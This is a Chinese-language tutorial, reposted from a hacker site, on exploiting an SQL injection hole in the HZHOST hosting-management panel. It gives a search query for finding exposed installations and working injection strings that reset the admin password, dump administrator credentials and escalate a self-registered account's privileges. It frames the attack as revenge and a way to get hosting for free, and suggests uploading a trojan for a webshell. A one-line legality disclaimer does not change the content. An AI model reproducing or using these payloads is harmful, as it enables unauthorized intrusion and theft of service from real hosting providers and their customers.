现在的空间是越来越贵了,不知道怎么回事,是不是空间商从中牟取暴力呢?想起来就是气啊。
HZHOST是一种空间商常用的一套在线开通ftp,sql,web的管理系统, 基本上国内50%的空间商都用了这套系统,前几天HZHOST爆出了严重的SQL注入漏洞,可算是我们要报仇了。
我们在百度搜索:title: (域名主机实时管理系统),可以看到搜索结果有6000多个,如图1,
随便找一个,打开后界面如图2,
我们在域名输入框中输入“123' and user > 0--”,然后再随便输入个密码,点一下登陆,返回了将 nvarchar 值 'hzhost' 转换为数据类型为 int 的列时发生语法错误”,如图3,
这说明我们基本成功了,只要我们在域名输入框中输入我们的注入语句,那……(后果很严重)……
现在我们再回到登录页面,在我们准备输入我们的注入语句时,发现了一个问题,输入框有输入长度限制,这个好办,我们在本地做个提交页面就可以了。在本地新建一个文本文档,写入如下代码:
]
保存后把后缀名改成.htm的网页格式。
打开我们保存的网页文件,如图4,
在注入语句中输入“123' Update [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' Where u_nme='admin'--”后按“提交”,则会出现如图5所示的情况,
这说明我们已经成功了。那我们刚才提交的那个注入语句到底是什么意思呢,这一句的意思就是将memlst中u_nme字段所对应的u_pss字段更改为e10adc3949ba59abbe56e057f20f883e,e10adc3949ba59abbe56e057f20f883e是123456经过md5加密后的值,也就是说提交了这一句以后,我们就已经把管理员组中的admin的密码改成了123456。
一般来说,管理员登陆的页面在http://www.xxx.com/master,我们现在上去看看。打开管理员登陆页面如图6所示,
我们输入刚才得到的账号和密码,按“登录”后成功的进入了后台,嘿嘿,现在可以免费用空间,用域名,用数据库了,嘿嘿。
大家在搞的时候可能会遇到点细节问题,比如admin不是超级管理员,或者admin被删除的情况。如果遇到这种情况,我们也不用着急,我们还有三种办法:
1.构造一个语句把管理员账号给暴出来
2.自己先注册个用户,然后提升自己注册用户的控制权限。
第一种方法:提交以下的注入语句:
123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and '1'='1
第二种方法:分别提交以下的注入语句:
123' Update [memlst] SET u_sys=6 Where u_nme='你注册的用户名'--
123' Update [memlst] SET u_pwr=2 Where u_nme='你注册的用户名'--
网上还有第三种方法,暴路径,备份差异,取webshell,这种方法太过烦琐,并且效果不是很好,本人不推荐,如果有朋友想拿webshell的话,直接开通一个空间,FTP个木马上去多方便?如图8。
请大家不要作于非法 只是知道原理就好
摘自红色黑客联盟(www.7747.net) 原文:http://www.7747.net/Article/200901/31469.html
我信了 触雷小心...
